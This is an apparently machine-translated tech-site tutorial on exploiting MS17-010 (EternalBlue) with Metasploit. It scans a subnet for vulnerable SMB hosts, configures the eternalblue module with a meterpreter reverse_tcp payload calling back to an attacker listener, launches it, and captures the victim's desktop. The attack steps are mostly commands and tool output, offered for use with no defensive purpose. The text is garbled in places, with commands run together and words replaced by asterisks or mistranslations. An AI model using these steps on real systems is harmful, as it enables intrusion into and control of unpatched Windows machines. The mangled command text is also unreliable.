Demonstration of the use of MS17-010 using MSF 01/16 Update SLTechnology News&Howtos

Demonstration of the use of MS17-010 using MSF

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Process:

1. Scanning: information collection (spying)

2. Vulnerability exploitation

First, detect the host system with vulnerabilities in the network segment:

Use the command:

Msf > use auxiliary/scanner/smb/smb_ms17_010 / / load scan expmsf auxiliary (scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1Universe 24 / / configure scan segment msf auxiliary (scanner/smb/smb_ms17_010) > run / / scan

The results are as follows:

Second, vulnerability exploitation

Msf makes use of the following commands:

Msf > use exploit/windows/smb/ms17_010_eternalblue / / load * * Module msf exploit (windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 / / configuration * * Target IPRHOSTS = > 192.168.22.25msf exploit (windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 / / configure Native IPLHOST = > 192.168.5.146msf exploit (windows/smb/ms17) _ 010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp / / configure the link back mode payload = > windows/x64/meterpreter/reverse_tcpmsf exploit (windows/smb/ms17_010_eternalblue) >

View the currently configured payload

Msf exploit (windows/smb/ms17_010_eternalblue) > show options / / View configuration options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description-GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.22.25 yes The target address RPORT 445 yes The target port (TCP) SMBDomain. No (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description-EXITFUNC thread yes Exit technique (Accepted:', seh, thread, process None) LHOST 192.168.5.146 yes The listen address LPORT 4444 yes The listen portExploit target: Id Name-0 Windows 7 and Server 2008 R2 (x64) All Service Packsmsf exploit (windows/smb/ms17_010_eternalblue) >

Initiate *:

* Command: msf exploit (windows/smb/ms17_010_eternalblue) > exploit / / initiate *

Get each other's desktop:

Meterpreter > screenshotScreenshot saved to: / root/RBDEvfGv.jpeg / / you can view the screenshot of each other's computer in the root directory.

Get shel permission

For more tips on obtaining permissions, please use your own module of Baidu msf.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.